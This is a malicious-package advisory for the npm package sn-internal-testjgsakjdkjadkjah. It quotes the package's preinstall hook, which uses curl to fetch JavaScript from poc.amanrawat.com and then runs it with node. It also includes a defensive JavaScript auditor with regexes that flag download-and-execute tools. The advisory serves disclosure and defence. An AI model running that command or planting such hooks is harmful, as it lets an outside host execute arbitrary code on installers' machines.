MAL-2026-6265
Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261)

package.json declares a preinstall lifecycle script that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On `npm install`, this downloads JavaScript from poc.amanrawat.com over an unpinned, unverified URL, overwrites the package's index.js with the fetched bytes, and immediately executes them with node under the installer's user privileges. The destination is a personal domain unrelated to any legitimate publisher infrastructure, the content is mutable (whatever bytes are served at request time are executed), and there is no hash, signature, or version pin. This is a textbook install-time remote code execution dropper: the attacker controlling poc.amanrawat.com can run arbitrary code on every machine that installs this package, including developer workstations and CI systems. Package metadata (name `sn-internal-testjgsakjdkjadkjah`, description 'This is our internal app for testing', author `amanrawat` matching the fetch domain) suggests a proof-of-concept publication, but the install-time behavior is functionally identical to a malicious dropper regardless of author intent.
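A defender-side check for the pattern described above, added here as an example (it is not code from the advisory or from amazon-inspector): it audits a parsed package.json for install-time lifecycle scripts that fetch remote content and then execute code. The function name `auditLifecycleScripts`, the hook list and the regexes are assumptions of this sketch, and the sample manifest is constructed from the advisory's description.

```javascript
// Hooks that npm runs automatically during `npm install` (assumed audit scope).
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics (assumptions, not an exhaustive ruleset).
const FETCH_RE = /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i;
const EXEC_RE = /\b(node|sh|bash|zsh|python3?|powershell|pwsh|eval)\b/i;
const URL_RE = /https?:\/\/[^\s"'|;&)]+/gi;

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Returns one finding per install hook that reaches out to the network.
function auditLifecycleScripts(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string" || !FETCH_RE.test(command)) continue;
    const urls = command.match(URL_RE) || [];
    // Strip URLs first so a path such as /node/ is not mistaken for an interpreter.
    const executes = EXEC_RE.test(command.replace(URL_RE, " "));
    findings.push({
      hook,
      command,
      hosts: [...new Set(urls.map(hostOf).filter(Boolean))],
      severity: executes ? "download-and-execute" : "network-fetch",
    });
  }
  return findings;
}

// Constructed sample: name, version and preinstall command as given in this advisory.
const SAMPLE_MANIFEST = {
  name: "sn-internal-testjgsakjdkjadkjah",
  version: "2.1.6",
  scripts: {
    preinstall: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js",
  },
};

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_MANIFEST), null, 2));
```

Installing with `npm install --ignore-scripts` prevents lifecycle hooks like this one from running at all, which makes it a useful default for CI and for inspecting an untrusted package.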
Affected packages
No fixed version published yet for sn-internal-testjgsakjdkjadkjah (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.6 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.4 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.5 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.3 [PACKAGE]
- https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjah/v/2.1.2 [PACKAGE]